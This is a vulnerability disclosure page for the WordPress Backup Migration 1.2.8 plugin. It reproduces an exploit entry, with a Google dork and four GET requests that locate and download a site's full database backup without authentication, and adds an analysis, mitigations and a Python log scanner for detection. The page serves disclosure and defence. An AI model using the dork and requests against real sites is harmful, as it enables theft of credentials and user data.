WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup

Exploit Author: Wadeek
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-05-23
# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")
# Date: 2023-05-10
# Exploit Author: Wadeek
# Vendor Homepage: https://backupbliss.com/
# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
# Version: 1.2.8
# Tested on: WordPress 6.2

1) Get the version of the plugin.

=> GET /wp-content/plugins/backup-backup/readme.txt
--------------------------------------------------------------------------
Stable tag: 1.2.8
--------------------------------------------------------------------------

2) Get the name of the backup directory.

=> GET /wp-content/backup-migration/config.json
--------------------------------------------------------------------------
{
[...],
"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
[...],
"OTHER:EMAIL":"admin@email.com"
}
--------------------------------------------------------------------------

3) Get the name of the archive containing the backups.

=> GET /wp-content/backup-migration/complete_logs.log
--------------------------------------------------------------------------
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
--------------------------------------------------------------------------

4) Build the path for the download.

=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip


WordPress Plugin Backup Migration 1.2.8: Unauthenticated Database Backup Vulnerability

Security researchers have uncovered a critical vulnerability in the Backup Migration plugin for WordPress, version 1.2.8, which allows attackers to access sensitive database backups without authentication. This flaw, discovered by security expert Wadeek, exposes the entire WordPress database—potentially including user credentials, posts, and configuration data—via publicly accessible directories.

Overview of the Vulnerability

The Backup Migration plugin, developed by BackupBliss, is designed to automate backups of WordPress installations. However, in version 1.2.8, a misconfiguration in the plugin's file storage and access control mechanisms leads to an unauthenticated database backup exposure.

Attackers can exploit this vulnerability by simply navigating to specific publicly accessible paths within the WordPress installation. No login or authorization is required—making this a particularly dangerous issue for websites with weak security practices.

Exploitation Steps and Technical Details

Here is a step-by-step breakdown of how the vulnerability can be exploited:

  • Step 1: Identify the Plugin Version

    Attackers begin by checking the readme.txt file located at:

    GET /wp-content/plugins/backup-backup/readme.txt

    This file contains the stable tag 1.2.8, confirming the vulnerable version.

  • Step 2: Locate the Backup Directory

    The plugin stores configuration data in config.json, which reveals the backup path:

    GET /wp-content/backup-migration/config.json

    Response:

    {
      "STORAGE::LOCAL::PATH": "/wp-content/backup-migration-xXxXxxXxXx",
      "OTHER:EMAIL": "admin@email.com"
    }

    From this, attackers identify the directory name, such as backup-migration-xXxXxxXxXx, which is used to store backups.

  • Step 3: Discover the Backup Archive Name

    By accessing the complete_logs.log file:

    GET /wp-content/backup-migration/complete_logs.log

    Response:

    BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip

    This log file reveals the naming pattern of backup archives, including timestamps and unique identifiers.

  • Step 4: Construct the Download Path

    With the directory and archive name known, attackers can directly download the backup:

    GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip

    This path is accessible to anyone with internet access, enabling full database extraction.

Real-World Impact and Risks

Consider a typical WordPress site running WordPress 6.2 with the Backup Migration 1.2.8 plugin installed. If the site owner fails to update or remove the plugin, attackers can:

  • Download the complete database backup, including user passwords (if stored in plaintext or weakly hashed).
  • Reconstruct the site’s content, configuration, and user data.
  • Perform credential harvesting or re-deploy the site in a malicious context.
  • Use the backup to conduct targeted attacks, such as phishing or social engineering.

This vulnerability is especially dangerous for small businesses, bloggers, or organizations that rely on WordPress without robust security measures.

Google Dork and Searchability

Security researchers have identified a Google Dork that can be used to locate vulnerable sites:

intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")

Using this query, attackers can quickly identify websites with the plugin installed. An index listing of the plugin folder confirms that the plugin is present; the installed version still has to be checked against the readme.txt stable tag, as in Step 1.

Security Recommendations and Mitigation

To protect against this exploit, site administrators must take the following actions:

  • Update or Remove the Plugin: Immediately uninstall or update the Backup Migration plugin to a secure version (if available).
  • Restrict File Access: Ensure that backup directories are not publicly accessible. Use .htaccess or server-level restrictions to deny access to sensitive folders.
  • Implement File Integrity Checks: Monitor for unexpected directories like backup-migration-xXxXxxXxXx and alert on their creation.
  • Use a Secure Backup Strategy: Prefer cloud-based or encrypted backups stored outside the public web root.
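To support the monitoring recommendation above, the following detection script is an added example (not part of the advisory or of the plugin) that scans web server access logs in the combined format for the request sequence the advisory describes. The log lines embedded in it are constructed samples; a 2xx status on one of the sensitive paths is treated as actual exposure, while a 403 is recorded as a blocked probe.

```python
import re

# Apache/nginx "combined" access-log format (sample lines below are constructed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Request paths the advisory walks through, from version fingerprint to archive download.
SIGNATURES = [
    ("readme_fingerprint", "low",
     re.compile(r'^/wp-content/plugins/backup-backup/readme\.txt$')),
    ("config_json_read", "high",
     re.compile(r'^/wp-content/backup-migration/config\.json$')),
    ("complete_logs_read", "high",
     re.compile(r'^/wp-content/backup-migration/complete_logs\.log$')),
    ("backup_archive_download", "critical",
     re.compile(r'^/wp-content/backup-migration-[^/]+/backups/BM_Backup_[^/]+\.zip$')),
]

def classify(line):
    """Return a finding dict if the line hits a signature, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]  # ignore query strings
    for name, severity, rx in SIGNATURES:
        if rx.match(path):
            status = int(m.group("status"))
            return {"ip": m.group("ip"), "path": path, "status": status,
                    "signature": name, "severity": severity,
                    # 2xx means the web server actually served the file.
                    "exposed": 200 <= status < 300}
    return None

def scan(lines):
    return [f for f in map(classify, lines) if f]

def exposed_ips(findings):
    # Clients actually served a sensitive file (a 403 on a probe is not exposure).
    return sorted({f["ip"] for f in findings if f["exposed"] and f["severity"] != "low"})

SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2023:10:01:02 +0000] "GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1" 200 5123 "-" "curl/7.88.1"',
    '203.0.113.7 - - [10/May/2023:10:01:05 +0000] "GET /wp-content/backup-migration/config.json HTTP/1.1" 200 2048 "-" "curl/7.88.1"',
    '203.0.113.7 - - [10/May/2023:10:01:09 +0000] "GET /wp-content/backup-migration/complete_logs.log HTTP/1.1" 200 9911 "-" "curl/7.88.1"',
    '203.0.113.7 - - [10/May/2023:10:01:20 +0000] "GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_2023-05-10_00_00_00_xXxXxxXxXxxXxXxx.zip HTTP/1.1" 200 48211733 "-" "curl/7.88.1"',
    '198.51.100.4 - - [10/May/2023:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 1300 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/May/2023:10:02:03 +0000] "GET /wp-content/backup-migration/config.json HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
]
```

Calling `scan(SAMPLE_LOG)` returns five findings, and `exposed_ips(...)` reduces them to the one client that was actually served the config, log and archive files; the 403 probe from the second client is logged but not counted as exposure.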

Vendor Response and Patch Status

As of May 2023, the vendor BackupBliss has not publicly released a patch for version 1.2.8. The plugin’s official download link remains available, indicating ongoing exposure.

Security experts recommend that users avoid using this plugin until a secure version is released, and instead use trusted alternatives such as UpdraftPlus, BackupBuddy, or WP Time Capsule.

Summary Table: Vulnerability Characteristics

--------------------------------------------------------------------------
Attribute       Value
--------------------------------------------------------------------------
Plugin Name     Backup Migration
Version         1.2.8
Exploit Type    Unauthenticated Database Backup Exposure
Attack Vector   Publicly accessible file paths
Impact          Full database access, credential theft, data compromise
Fix Status      Not patched as of May 2023
--------------------------------------------------------------------------

Organizations relying on WordPress must prioritize plugin security audits. This vulnerability serves as a stark reminder: even well-intentioned tools can become security liabilities if not properly secured.